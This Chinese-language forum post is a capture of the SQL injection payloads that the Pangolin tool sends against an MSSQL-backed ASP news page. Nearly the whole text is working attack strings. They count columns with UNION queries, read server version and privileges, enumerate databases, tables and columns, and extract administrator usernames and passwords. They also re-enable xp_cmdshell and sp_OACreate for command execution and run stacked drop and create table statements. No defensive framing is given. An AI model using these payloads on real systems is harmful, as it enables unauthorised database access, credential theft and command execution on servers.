穿山甲MSSQL注射抓包（部分） - 好技术常识经验网

穿山甲MSSQL注射抓包（部分）

作者：TheLostMind

看了下穿山甲，很牛X的工具，抓了下包，随便整理了以下，无聊时看看……
＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝
Target url is : http://www.xxx.com/news.asp?class_id=1165
HTTP Method is : GET
Inject type is : Integer
Do you really want to delete it?
Field count is : 14
The field's count 14
The string field position at 2

抓包内容：

union all select null-- and 1=1

union all select null,null-- and 1=1

union all select null,null,null-- and 1=1

这里省略…………………………………………
union all select null,null,null,null,null,null,null,null,null,null,null,null,null-- and 1=1

union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null-- and 1=1

and 1=2 union all select cast

(0x616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161 as varchar

(8000)),null,null,null,null,null,null,null,null,null,null,null,null,null-- and 1=1

and 1=2 union all select null,cast

(0x616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161 as varchar

(8000)),null,null,null,null,null,null,null,null,null,null,null,null-- and 1=1

and 1=2 union all select null,cast(db_name() as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1

获取综合信息：

and 1=2 union all select null,cast(@@version as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1

and 1=2 union all select null,cast(db_name() as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1

and 1=2 union all select null,cast(@@servername as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1

and 1=2 union all select null,cast(system_user as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1

and 1=2 union all select null,cast(user as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1

and 1=2 union all select null,cast(is_srvrolemember(0x730079007300610064006d0069006e00) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1

and 1=2 union all select null,cast(is_member(0x640062005f006f0077006e0065007200) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1

and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as

nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename

from (select top 1 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1

and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as

nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename

from (select top 2 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1

and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as

nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename

from (select top 3 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1

and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as

nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename

from (select top 4 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1

这里省略……………………

and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as

nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename

from (select top 40 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1

;drop table foofoofoo;-- and 1=1

;create table foofoofoo(name nvarchar(255),low nvarchar(255),high nvarchar(255),type nvarchar(255));-- and 1=1

;insert foofoofoo exec master.dbo.xp_availablemedia;-- and 1=1

and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([type] as nvarchar(4000)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 * from (select top 1 * from

foofoofoo order by [name] group by name) t order by [name] desc)t-- and 1=1

;drop table foofoofoo;-- and 1=1

;create table foofoofoo(name nvarchar(255),description nvarchar(4000));-- and 1=1

;insert foofoofoo exec master.dbo.xp_enumgroups;-- and 1=1

and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([description] as nvarchar(4000)) as

nvarchar(4000)) ,null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 * from (select top

1 * from foofoofoo order by [name] group by name) t order by [name] desc)t-- and 1=1

;drop table foofoofoo;-- and 1=1

获取表：
and 1=2 union all select null,cast(cast(count(*) as varchar(10)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from [sky_yanjiusuo]..[sysobjects] where

xtype=char(85) and status>0--

and 1=2 union all select top 1 null,cast(cast(name as varchar(256)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id,name from (select top 1

id,name from [sky_yanjiusuo]..[sysobjects] where xtype=char(85) and status>0 order by 1) t order by 1 desc)t--

and 1=2 union all select top 1 null,cast(cast(name as varchar(256)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id,name from (select top 2

id,name from [sky_yanjiusuo]..[sysobjects] where xtype=char(85) and status>0 order by 1) t order by 1 desc)t--

这里省略………………

and 1=2 union all select top 1 null,cast(cast(name as varchar(256)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id,name from (select top 15

id,name from [sky_yanjiusuo]..[sysobjects] where xtype=char(85) and status>0 order by 1) t order by 1 desc)t--

获取列：
and 1=2 union all select top 1 null,cast(cast(id as nvarchar(20)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from [sky_yanjiusuo]..[sysobjects] where

name=0x73006b0079005f005500730065007200--

and 1=2 union all select null,cast(cast(count(*) as varchar(10)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from [sky_yanjiusuo]..[syscolumns] where

id=2068202418--

and 1=2 union all select top 1 null,cast(cast(name as varchar(8000)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 colid,name from (select top

1 colid,name from [sky_yanjiusuo]..[syscolumns] where id=2068202418 order by 1) t order by 1 desc)t--

and 1=2 union all select top 1 null,cast(cast(name as varchar(8000)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 colid,name from (select top

2 colid,name from [sky_yanjiusuo]..[syscolumns] where id=2068202418 order by 1) t order by 1 desc)t--

这里省略……………………
and 1=2 union all select top 1 null,cast(cast(name as varchar(8000)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 colid,name from (select top

10 colid,name from [sky_yanjiusuo]..[syscolumns] where id=2068202418 order by 1) t order by 1 desc)t--

and 1=2 union all select top 1 null,cast(cast(name as varchar(8000)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 colid,name from (select top

11 colid,name from [sky_yanjiusuo]..[syscolumns] where id=2068202418 order by 1) t order by 1 desc)t--

获取内容：

and 1=2 union all select null,cast(cast(count(*) as varchar(8000)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from [sky_yanjiusuo]..[sky_user] where 1=1--

and 1=2 union all select top 1 null,cast(cast(id as varchar) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id from (select top 1 id

from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--

and 1=2 union all select top 1 null,cast(cast(admin_name as varchar) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 admin_name from (select top

1 admin_name from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--

and 1=2 union all select top 1 null,cast(cast(admin_password as varchar) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 admin_password from (select

top 1 admin_password from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--

and 1=2 union all select top 1 null,cast(cast(id as varchar) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id from (select top 2 id

from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--

and 1=2 union all select top 1 null,cast(cast(admin_name as varchar) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 admin_name from (select top

2 admin_name from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--

and 1=2 union all select top 1 null,cast(cast(admin_password as varchar) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 admin_password from (select

top 2 admin_password from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--

恢复XP_CMDSHELL:

and substring(cast(serverproperty(0x700072006f006400750063007400760065007200730069006f006e00) as nvarchar(4000)),

1, 1)>8

;exec master.dbo.sp_addextendedproc 0x780070005f0063006d0064007300680065006c006c00,

0x780070006c006f006700370030002e0064006c006c00--

恢复SP_OA……
;exec master.dbo.sp_addextendedproc 0x730070005f004f004100430072006500610074006500,

0x780070006c006f006700370030002e0064006c006c00--

列磁盘：
;drop table foofoofoo;--

;create table foofoofoo(name nvarchar(255),low nvarchar(255),high nvarchar(255),type nvarchar(255));--

;insert foofoofoo exec master.dbo.xp_availablemedia;--

and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000))cast([type] as nvarchar(4000)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 * from (select top 1 * from

foofoofoo order by [name] group by name) t order by [name] desc)t--

;drop table foofoofoo;--

不抓了。。。。自己抓吧………………
＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝

发表于 2021-04-10 08:47
阅读 ( 195 )
分类：互联网